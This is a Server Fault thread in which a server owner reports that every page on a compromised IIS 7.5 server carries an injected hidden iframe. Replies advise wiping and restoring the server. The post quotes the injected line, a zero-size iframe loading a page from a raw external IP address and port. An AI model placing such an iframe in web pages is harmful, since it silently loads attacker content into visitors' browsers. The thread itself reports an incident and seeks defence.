# IIS 7 Serving all pages with an injected iframe

Tags: iis-7.5, malicious

> **Possible Duplicate:**
>   [My server's been hacked EMERGENCY](https://serverfault.com/questions/218005/my-servers-been-hacked-emergency)

**This is not a duplicate. The question above doesn't explain how that can be done.**

My VPS just got hacked an all my pages are being served with an malicious iframe injected just before the html tag.

The code is like this:

```
<iframe src= http://117.21.247.171:700/1.htm width=0 height=0></iframe>                                                                                                                                                                                                                                   
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="pt-BR"> ...
```

Firstly I thought it could be something related with wordpress, but my asp.net sites are also infected and even if I create a static html file with nothing inside, the iframe is injected.

I'm using a Windows Server 2008 R2 Standard with IIS7.5 7600.

EDIT: Hey, why was this closed?

I'm very interested to know how that be done in IIS, any ideas?

Andre

Comment: You may not think this is a duplicate, but it is. The real answer is wipe the server, re-install from known good backups. Sorry, you can't trust compromised servers.

Comment: I agree with you, but that's not the question. I already reinstalled everything, that's not the point. I'm curious to know how that can be done.

Comment: @AndreCarlucci, I suggest you ask over at [ITSecurity.StackExchange](http://security.stackexchange.com/). They might already have an answer.

Answer (score 0):

For all intents and purposes, it doesn't matter. Your server got hacked - what you need to do is restore from a last good known backup and ensure you're fully patched, have a sufficient firewall and IPS in place and reset all passwords.

Comment: I know. But that's not the question. The question is how that can be done.